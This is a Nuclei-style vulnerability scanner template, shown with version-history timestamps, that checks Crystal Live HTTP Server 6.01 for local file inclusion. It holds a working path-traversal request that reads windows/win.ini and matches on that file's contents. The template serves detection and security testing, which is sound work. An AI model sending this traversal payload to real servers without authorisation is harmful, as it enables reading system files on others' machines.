2022-08-04 14:55:57 +00:00
|
|
|
id: crystal-live-server-lfi
|
2022-07-26 04:38:21 +00:00
|
|
|
|
|
|
|
info:
|
2023-01-16 17:41:15 +00:00
|
|
|
name: Crystal Live HTTP Server 6.01 - Local File Inclusion
|
2022-07-26 04:38:21 +00:00
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
2023-01-16 17:41:15 +00:00
|
|
|
description: Crystal Live HTTP Server 6.01 is vulnerable to local file inclusion.
|
2022-07-26 04:38:21 +00:00
|
|
|
reference: https://cxsecurity.com/issue/WLB-2019110127
|
2023-01-16 17:41:15 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cwe-id: CWE-22
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-10-14 11:27:55 +00:00
|
|
|
tags: lfi,crystal
|
2022-07-26 04:38:21 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-07-26 04:38:21 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2022-08-02 10:19:21 +00:00
|
|
|
part: body
|
2022-07-26 04:38:21 +00:00
|
|
|
words:
|
|
|
|
- "bit app support"
|
|
|
|
- "fonts"
|
|
|
|
- "extensions"
|
2022-08-04 14:55:57 +00:00
|
|
|
condition: and
|
2023-10-19 13:13:52 +00:00
|
|
|
# digest: 4a0a004730450220285132346bb2db8c15d789bb5c368ba6e76b672fbc97bcd99be8d5656294596b0221008798724466e19a4e657bcdac59f43bf34386e4dbc157dea399267d3a75d80838:922c64590222798bb761d5b6d8e72950
|